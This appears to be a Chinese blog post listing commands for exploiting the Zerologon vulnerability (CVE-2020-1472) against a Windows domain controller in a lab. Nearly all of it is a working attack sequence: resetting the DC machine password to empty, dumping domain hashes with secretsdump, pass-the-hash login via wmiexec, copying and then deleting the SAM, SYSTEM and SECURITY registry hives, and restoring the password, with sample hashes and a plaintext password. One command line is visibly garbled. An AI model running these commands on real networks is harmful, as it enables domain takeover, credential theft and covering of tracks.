关于CVE-2020-1472域渗透提权的一些常用命令
关于CVE-2020-1472域渗透提权的一些常用命令
工具下载地址:
https://github.com/SecuraBV/CVE-2020-1472/archive/refs/heads/master.zip
https://github.com/risksense/zerologon
python3 zerologon_tester.py WIN-2008-DC 192.168.3.123
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
python3 set_empty_pw.py WIN-2008-DC 192.168.3.123
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'ggyao.com/WIN-2008-DC$@192.168.gyao.com/WIN-2008-DC$@192.168.3.123'
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24 ggyao/administrator@192.168.3.123
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
python3 reinstall_original_pw.py WIN-2008-DC 192.168.3.123 6493fcc57bd126e9ab8fb9f56e8a79c9
secretsdump.py ggyao.com/administrator:1qaz@WSX@192.168.3.123 -just-dc-user 'WIN-2008-DC$'
<< 上一篇